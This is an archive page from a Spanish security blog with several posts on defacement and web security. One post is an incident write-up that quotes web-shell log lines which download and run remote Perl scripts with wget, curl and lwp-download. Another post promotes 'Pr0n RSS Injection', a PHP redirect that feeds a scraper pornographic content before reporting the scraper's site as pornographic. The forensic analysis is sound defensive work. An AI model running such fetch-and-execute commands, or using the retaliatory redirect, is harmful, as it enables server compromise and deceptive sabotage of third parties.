miércoles, octubre 27, 2021
lunes, febrero 13, 2017
Cómo tu web se ve "fea" en Google Chrome por ser "insegura"
![]() |
Figura 2: Una alerta de seguridad en la web de Hackr0n en Google Chrome |
![]() |
Figura 3: Explicación en Google de la alerta de Google Chrome |
![]() |
Figura 4: Scripts de la web de Hackr0n. Todos ok. |
a) Contenido externo
b) Se carga bajo HTTP en lugar de HTTPs
![]() |
Figura 5: Los links inseguros en la web de Hackr0n |
![]() |
Figura 6: Web insegura con las tipografías correctas |
Publicado por
Chema Alonso
a las
6:01 a. m.
5
comentarios
Etiquetas: Cifrado, Curiosidades, defacement, Eventos, HTML, https, mitm
miércoles, marzo 18, 2015
Ataque de "Pr0n RSS Injection" y pon fin a los plagiadores
![]() |
Figura 1: Ataque de "Pr0n RSS Injection" y pon fin a los plagiadores |
Puede que ya conozcáis la comunidad profesional de ITPro.es, la cual está formada por unos 80 expertos en Tecnologías de la Información que a diario publican artículos técnicos de calidad y en español. Si alguna vez has abierto un blog, sabrás lo duro que es generar contenido original valioso, y lo que cuesta crear un artículo con algo que no esté publicado en la web o que aporte valor al lector. En nuestro caso, el propietario del sitio web Corei7.com quiso aprovechar todos los contenidos que la Comunidad ITPro genera para enriquecer, de forma automática su blog y ganar visitas sin esfuerzo.
![]() |
Figura 2: Contenido original en ITPro.es |
Esto, realmente no es bueno a priori para nadie, ya que al final el sistema inteligente que usan los buscadores para detectar la fuente original encontraría que ese sitio es una copia del original, pero en un escenario de condición de carrera, podría lograr ser indexado antes que el sitio original y lograr enlaces de terceros que posicionen su contenido por encima del original. Lo que perjudicaría doblemente al creador original del contenido.
Hace unos días, uno de los miembros de la Comunidad ITPro descubrió que el sitio Corei7.com le estaba copiando sus propios artículos y también los del resto de compañeros, así que nos lo reportó inmediatamente para que tomase medidas al respecto, puesto a que el número de visitas se estaba viendo afectado, además del pagerank del sitio.
![]() |
Figura 3: Contenido copiado vía RSS en Corei7.com |
Desde la comunidad tratamos muy cordialmente de contactar con el responsable del sitio web para solicitarle la retirada de los artículos, pero éste no respondió los correos, así que con mucho ingenio optamos por darle una lección basada en hacerle comer otro tipo de artículos no esperados con un ataque de Pr0n RSS Injection.
El blog del copiante presume de tener “La mejor información tecnológica” pero realmente se estaba alimentando de los artículos de otros integrándolos vía RSS, así que desde ITPro se decidió hacer una pequeña modificación en la web original, que consiste en redirigir a un RSS algo especial a todas las peticiones que se hicieran al feed RRS que procediesen de la dirección IP de ese sitio web en concreto. Algo tan sencillo como crear esta regla en el código del servidor que sirve el RSS:
if("206.190.143.186"== $_SERVER['REMOTE_ADDR']) {Desde ese preciso momento, en el blog del plagiador que se dedica a reutilizar el contenido de los blogs en Internet, empezaron a crearse nuevas entradas con un contenido muy diferente al que estaba teniendo hasta ahora, tal y como podéis ver en la siguiente imagen. Esto no es nuevo, y al igual que en los casos de hotlinking, es un riesgo al que te sometes cuando integras contenido externo en tu web.
header('Status: 301 Moved Permanently');
header('Location: http://sinmanias.blogspot.com/feeds/posts/default?alt=rss');
}
![]() |
Figura 4: Ataque de Pr0n RSS Injection en Corei7.com |
Si decides leer al artículo completo, te encontrarás con fotos, vídeos, etcétera del nuevo contenido del blog que generan un nuevo escenario temático y por tanto la necesidad de una nueva clasificación en las bases de datos de contenidos. Por si fuera poco, esto no termina aquí. Acto seguido se reportó en Google, Bing, Facebook, Twitter, etcétera que el contenido de ese sito web era altamente pornográfico e inapropiado, por lo que fue clasificado como es debido y retirado de los motores de búsqueda y las redes sociales. En el caso de Google, esta denuncia de contenido se realiza desde el siguiente enlace: Denuncia de Contenido en Google.
![]() |
Figura 5: Denuncia de contenido inapropiado en Google |
Tras esto, las visitas del sitio copiante han bajado, y las ganas de copiar contenido de los blogs de la Comunidad de ITPro por parte de este sitio también. Si tienes un blog y te copian el contenido de forma ilícita, ya sabes cómo arreglarlo, haz un Pr0n RSS Injection y denúncialo en los buscadores y redes sociales. Mano de santo.
Autor: Daniel Alonso
Administrador Comunidad ITPro
Publicado por
Chema Alonso
a las
7:01 a. m.
33
comentarios
miércoles, agosto 27, 2014
Riesgos de seguridad al cargar contenido externo en tu web
![]() |
Figura 1: Esquema del ataque de SEA a la web de la RSA Conference |
![]() |
Figura 2: Defacement mostrado por el fichero JavaScript malicioso cargado remotamente |
![]() |
Figura 3: Esquema de Malvertising utilizado a través de Yahoo! Ad Network |
![]() |
Figura 4: Un mensaje típico de una web enfadada por el Hot-Linking |
La privacidad de los usuarios
Cuando se carga contenido externo de una web remota, el uso de ese fichero JavaScript podría llevar a que se accediera a mucha información de la navegación de los usuarios. Es utilizado habitualmente por servicios de estadísticas, pero también mucho proveedores de tecnología hacen un seguimiento excesivo de la navegación de los usuarios.
![]() |
Figura 5: Cómo Facebook espía la navegación de sus usuarios |
Facebook está siendo investigado por la Unión Europea por espiar la navegación de los usuarios y Google ya fue demandado en Estados Unidos por espiar a sus usuarios. Ponerles sus librerías es abrir esa puerta de acceso a datos de tus clientes.
![]() |
Figura 6: Contenido externo cargado en una web, visto con el inspector de contenido de Google Chrome |
Contenido externo y rendimiento
Una de las cosas que pueden llevar a alguien a cargar contenido desde servidores remotos es el límite de conexiones concurrentes paralelas que se pueden hacer desde un navegador de Internet a un servidor web. Esto no debería de ser un problema. En el caso de los límites del servidor web, eres tú el que lo controlas y configuras, así que haz tunning de tu servidor web y listo.
![]() |
Figura 7: Tabla de conexiones concurrentes por hostname en cada navegador |
En el caso del navegador del cliente sí que hay límites, pero los límites son por hostname, y como puede verse, estas son muchas. Si el rendimiento es un issue y necesitas paralelizar, lo mejor es que optimices el contenido que vas a cargar al cliente, uses ficheros JavaScript comprimidos y en bundle, y si son muchos los archivos que necesitas, pues que montes tu propia CDN con distintos hostnames o uses una CDN de confianza como servicio, pero cargar contenido de "por ahí" tiene sus riegos, así que evita todos los que puedas.
Saludos Malignos!
Publicado por
Chema Alonso
a las
7:01 a. m.
1 comentarios
Etiquetas: auditoría, blogs, Botnets, defacement, Eleven Paths, Faast, fortificación, Hacking, javascript, Malware, pentesting
martes, julio 01, 2014
BiciMad, BonoPark, un pene erecto y denuncias por doquier
![]() |
Figura 1: La alcaldesa de Madrid en la presentación de BiciMad |
1) Mal dimensionamiento del servicio: Al poco del lanzamiento entre faustos y algarabías, el servicio se cayó. No es que hubieran sufrido un ataque cibernético de DoS o DDoS, nada más lejos de la realidad. Simplemente el uso normal de los clientes en primera instancia llevó a la lona el servicio
¿Cómo es posible que el servicio sufriera una denegación de servicio solo por la demanda de usuarios? Si esto ha sido así solo por el uso, hay que suponer que no tienen AntiDDoS ni nada similar, así que en el momento en que alguien le apunte una botnet o haga un ataque de amplificación, esto se va al suelo otra vez.
![]() |
Figura 2: Un kiosco de BiciMad sin servicio |
2) Sin auditoría de seguridad web: Clama al cielo ver que en la auditoría que le hicieron inicialmente, con cariño y sin necesidad de que la solicitaran, se pudiera ver que se habían dejado hasta las claves de los certificados publicadas.
![]() |
Figura 3: Directory Listing en la web de BiciMad y ficheros de claves .pem |
Con sus directory listing, con sus APIs sin proteger y con el volcado de todos los datos de la base de datos. Eso sí, como ellos dicen, nunca han sido hackeados.
3) Los kioscos interactivos, también si auditar: Ni sé ni cuantas veces he insistido en que cuando pones un Punto Interactivo, o un kiosco en los que los usuarios tienen acceso físico, la cosa puede acabar en drama. Ya he publicado múltiples ejemplos de estos fallos, pero en esta ocasión en BiciMad, la cosa llegó a las manos, o mejor dicho, a los penes, y acabó sufriendo el defacement de un pene que ha dado la vuelta al mundo.
![]() |
Figura 4: El vídeo del pene de marras en el Totem de BiciMad |
Este ataque parece un homenaje al hacker que hizo algo parecido en la autopista de Moscú, poniendo un vídeo porno en un video-wall causando kilómetros y kilómetros de atascos, que sólo podrían haberse resuelto si los ciudadanos de Moscú pudieran disponer de un servicio de alquiler de bicicletas tipo BiciMoscú... oh, wait!
![]() |
Figura 5: Bonopark denunciará a los atacantes de BiciMad |
Publicado por
Chema Alonso
a las
6:22 a. m.
23
comentarios
Etiquetas: auditoría, DDOS, defacement, DoS, hacked, Hacking, Kioskos Interactivos, pentesting
viernes, abril 18, 2014
Una historia personal con servidores owneados en mi red
Para poder entender la situación mejor, digamos que el escenario de trabajo es una gran empresa que se encuentra “dividida” en dos más pequeñas. De ellas, el equipos IT de una de ellas es el que se encarga de la conectividad con el exterior y el equipo IT de la otra de los sistemas. Este entorno fueza a que el acceso desde Internet a la de empresa que se encarga de los sistemas debe pasar obligatoriamente por las redes de la otra empresa. Yo formo parte de la de empresa que gestiona los sistemas.
La empresa de conectividad nos envía un comunicado en el que parece ser que nuestro frontal web tiene instalada un web shell WSO 2.5. Sin embargo, analizando la traza incompleta que nos proporcionaron, veo que hay una dirección IP con puerto 81 “escondida” por ahí que corresponde a un firewall. Viendo la configuración del firewall veo que el puerto 81 lo redirige a un servidor que no gestionamos nosotros. Analizando los ficheros de log de Apache, veo una serie de llamadas a ficheros PHP más que sospechosos, casi todas ellas con estado de respuesta 404. Por ejemplo:
GET /blablabla/images/stories/food.php?rfMmm curioso. Decido buscar qué peticiones a ficheros PHP tuvieron éxito utilizando egrep “php.*200” log y aquí es donde empiezan los resultados interesantes. Algunas muestras de peticiones que tuvieron éxito son las siguientes:
HTTP/1.1" 404 1024 "Mozilla/5.0
(Windows; U; Windows NT 5.1; en-US; rv:1.9.2)
Gecko/20100115 Firefox/3.6"
GET /blablabla/images/stories/food.php?cmd=
wget%20http://www.regme.cz/wp-content/uploads/2014/02/robot.txt;
perl%20robot.txt;perl%20robot.txt;perl%20robot.txt;perl%20robot.txt;
perl%20robot.txt;perl%20robot.txt;rm%20-fr %20robot.*
HTTP/1.1" 200 - "Mozilla/5.0
(Windows; U; Windows NT 5.1; en-US; rv:1.9.2)
Gecko/20100115 Firefox/3.6
GET /blablabla/images/stories/food.php?cmd=
curl+-C+-+-O+http://tarmim.pl/Albasoul/alb.txt
%3Bperl+alb.txt%3Brm+alb.txt
HTTP/1.1" 200 845 "Mozilla/5.0
(Windows; U; Windows NT 5.1; en-US; rv:1.9.2)
Gecko/20100115 Firefox/3.6
GET /blablabla/images/stories/food.php?cmd=cd%20/tmp%20;Y así seguían unas cuantas decenas más de ellas. A su vez, cada uno de esos scripts llamaba a otros scripts de otros sitios que supongo que habrán sido comprometidos también por el mismo ataque. Como parece más que evidente, el fichero de la WebShell lleva por nombre food.php, así que me puse en contacto con alguien que tuviera acceso a ese equipo detrás del firewall que hacía las llamadas y preguntarle por ese archivo en el servidor web.
lwp-download%20http://www.ciaenote.com.br/lojawp/wpcontent/upgrade/p.log;
perl%20p.log%20;%20rm %20-rf%20p.log
HTTP/1.1" 200 901 "Mozilla/5.0
(Windows; U; Windows NT 5.1; en-US; rv:1.9.2)
Gecko/20100115 Firefox/3.6"
El responsable confirmó que sí, que estaba ese fichero y también otro con nombre food2.php. Para evitar que pudiera ser utilizado por los atacantes, pedí que fuera eliminado ese fichero para que, a priori, ahí queda el límite del incidente. Sin embargo, todos los que estamos relacionados con la seguridad informática,sabemos que una vez que un servidor ha sido comprometido lo mejor es aplicar "fuego purificador" en ese servidor para evitar ser afectados por cualquier otro backdoor que hubiera podido ser instalado en la máquina.
El proceso habitual sería hacer un análisis forense de la máquina para averiguar cómo se produjo la intrusión y en paralelo restaurar una copia de seguridad que se sepa que está bien, poniendo mil ojos a las opciones de monitorización y auditoría hasta que se sepa cómo entró la WebShell en el sistema.
Como os he contado al principio, la máquina no está en nuestra empresa, así que al comentar los siguientes pasos a realizar con los responsables de la máquina nos informaron de un pequeño problema. Como "buena práctica de seguridad", no se hacen backups de esa máquina. De todas formas, como veremos un poco más adelante, si se hubieran hecho las copias de seguridad de poco hubiera servido.
Mientras pasaban todos estos acontecimientos, echando un vistazo a los ficheros de log, me di cuenta de que otra llamada parecía indicar con más que toda probabilidad la existencia de otra shell en el sistema:
GET /blablabla/images/stories/vvv3.php? p=edit&Esta vez, en vez de solicitar que miraran si ese archivo existía, lo que hice fue conectarme directametne a ese fichero PHP. Normalmente, cuando un pentester o un defacer profesional sube una WebShell a un servidor, lo hace estableciendo una contraseña, pero como ya se ha visto muchas veces, hay WebShells subidas sin ninguna protección y hasta indexadas en Google, así que había que probar cuál es el tipo de atacante al que nos enfrentamos.
dir=/srv/www/htdocs/blablabla/images/stories&
file=/srv/www/htdocs/blablabla/images/storie s/food.php
HTTP/1.1" 200 4506 "Mozilla/5.0
(Windows NT 6.2; WOW64; rv:27.0
Gecko/20100101 Firefox/27.0"
![]() |
Figura 1: WebShells indexadas en Google |
No fue muy difícil, una petición et voilà! La WebShell no tiene ninguna protección de seguridad y yo tengo acceso al servidor con los privilegios del usuario Apache, pudiendo ejecutar cualquier comando siempre que este usuario tenga esos permisos - por eso es tan importante el Hardening de lo sistemas GNU/Linux -.
![]() |
Figura 2: WebShell en los servidores owneados. |
De un modo irónico, gracias a esta WebShell pude seguir investigando el compromiso de nuestros equipos, detectando unas cuantas WebShells más, como por ejemplo el zet.php que aparece en la imagen superior. También detecté numerosas aplicaciones para el envío masivo de e-mails en campañas de spam, por ejemplo el wew.php que sale en el listado anterior.
![]() |
Figura 3: Conexión desde Kali Linux al programa PHP para hacer la campaña de spam |
Una vez identificado el compromiso, me puse a investigar en los ficheros de log desde cuándo habían sido vulnerados y owneados estos servidores. El reporte de la empresa de conectividad hacía referencia al 14 de Febrero de este año pero tirando de trazas en los ficheros de log yo llegué hasta Octubre del año pasado detectando el problema - antes de que desde “arriba” me dijeran que dejara de lado esta tarea, que ya no era importante, y me pusiera con otra -.
Este es el motivo por el que dije antes que si hubiera habido backups de poco servirían a priori, ya que se estarían realizando copias de seguridad infectadas desde al menos Octubre, lo que deja claro que antes de tomar una decisión apresurada hay que acotar el impacto de la infección. Por supuesto, si esas copias además hubieran sido analizadas como parte de una estrategia antimalware, probablemente hubiera sido mucho más sencillo y rápido detectar la intrusión.
Al final al menos pude convencer de que este servidor ya no era seguro, y que lo mejor que se podía hacer era - y por suerte, así se hizo -, portar sus servicios clave a una instalación nueva, por lo que ya ese servidor no existe. El otro punto bueno, - si es que una intrusión puede tenerlo - fue que gracias a todo esto, pude “concienciar” un poco al resto del equipo y muchos superiores de la importancia de la implementación de controles de seguridad - y que éstos funcionen- , por lo que me han permitido dedicar parte de mi tiempo para encargarme de dichas tareas.
![]() |
Figura 4: Aplica fuego purificador al servidor y listo |
Esta fue una experiencia personal que he vivido en mi empresa, y que si sirve para que alguien aprenda en experiencia ajena, empieces a luchar por poner controles de seguridad los servidores de tu empresa para evitar descubrir meses después que tus sistemas están comprometidos.
Autor: Ayoze Fernández
Publicado por
Chema Alonso
a las
8:23 a. m.
6
comentarios
Etiquetas: defacement, defacers, Hacking, kali, Linux, Malware, PHP, Spam
martes, septiembre 17, 2013
Hackers, Hacktivistas & Ciber-Criminales en los media
La noticia dice: "[...]el Ministerio de Seguridad nacional dio a conocer el caso: "Se detuvo a un joven súper-hacker, líder de una red integrada por siete personas, especializado en fraudes electrónicos trasnacionales y complejas triangulaciones de financieras que concretaba vulnerando la seguridad de varias webs de transferencia de dinero y juegos por internet", precisó en un comunicado.
El joven, de 19 años, es hijo de un ingeniero informático. En su casa tenía lo que los investigadores definieron como una "Baticueva tecnológica". ¿Qué es eso? "Computadoras con capacidades de cálculo muy superiores a las corrientes, cables de conexión especiales, servers rackeables, routers y 14 discos rígidos".
![]() |
Figura 1: La Baticueva Tecnológica del"superhacker" |
Por supuesto para nosotros, en esta noticia de Infobae, a lo que se refieren realmente es a una banda de ciber-criminales dedicada al Fraude Online.
Hackers brasileños invaden sitios de NASA en protesta
La notica dice: "Um grupo hacker brasileiro invadiu pelo menos 14 subdomínios da Nasa, a agência espacial brasileira. Os sites atacados são todos hospedados no Vale do Silício, região da Califórnia conhecida por manter empresas de tecnologia. Na noite desta segunda-feira, os domínios estavam fora do ar.
Segundo a reportagem, os ataques começaram na última terça-feira. Um funcionário da Nasa confirmou os ataques a uma TV, contrariando uma nota da agência, mas disse que nenhuma informação confidencial foi acessada."
![]() |
Figura 2: Imagen utiliza en el defacement de los subdominios de la NASA |
We covered what you might call the regular-sized Pwn2Own earlier this year, from the announcement of its $500,000 in prize money to the day by day results. The outcome was a series of victories for the hackers, with HP ultimately paying out $480,000.En esta noticia, en el fantástico blog de Naked Security, se habla de hackers ganando dinero por encontrar y explotar vulnerabilidades en terminales móviles, pero dentro de las famosas conferencias Mobile Pwn2Own, y donde se encuentran y parchean los bugs que se descubren sin que puedan utilizarse para el mal. El año pasado, por ejemplo, se encontró el primer bug de Mobile Safari en iOS 6 para ejecutar código arbitrario aunque en algunas versiones de Apple Safari tardara un año en parchearlo.
Tres sitios en los medios en los que se habla de hackers, y en los que para nosotros hablan de cosas diferentes por las motivaciones, que no por las técnicas que pueden utilizar.
Saludos Malignos!
Publicado por
Chema Alonso
a las
11:00 a. m.
6
comentarios
Etiquetas: cibercrimen, defacement, Eventos, fraude online, hackers, hacktivismo
Entrada destacada
+300 referencias a papers, posts y talks de Hacking & Security con Inteligencia Artificial
Hace un mes comencé a recuperar en un post mi interés en los últimos años, donde he publicado muchos artículos en este blog , y he dejado mu...

Entradas populares
-
Circula por la red un truco que llegó a mí de casualidad , donde se explica cómo conseguir ver más de una vez - e incluso capturar - las fot...
-
Ayer publiqué un post que tiene ver con las opciones de privacidad de Facebook asociadas a los correos electrónicos , y mañana sacaré la se...
-
Las técnicas de OSINT son aquellas que te permiten buscar información en fuentes abiertas. O lo que es lo mismo, sacar datos de plataformas...
-
Hoy os traigo una " microhistoria " peculiar que tiene que ver con la historia de la tecnología. Es una historia de esas que empie...
-
Hace mucho tiempo, cuando se creo el " Modo Incógnito " de los navegadores, que algunos llamaron también " Modo Privado ...
-
Dentro de una investigación de una fotografía, tal vez te interese saber dónde está hecha, o a qué hora se hizo. Cualquiera de esas dos info...
-
Conseguir la contraseña de Facebook de una cuenta es una de las peticiones más usuales que se suele recibir de la gente que busca solucion...
-
Una de las opciones que se puede configurar a nivel de hipervínculo, de documento o de servidor web en los navegadores es el funcionamiento...
-
El SEPE (Servicio Público de Empleo Estatal) ha sido víctima de la archiconocida crisis del COVID-19 enlazando la avalancha de expedientes...
-
La app de mensajería instantánea Telegram tiene muchos fans por el atributo de seguridad que ha querido potenciar desde el principio, per...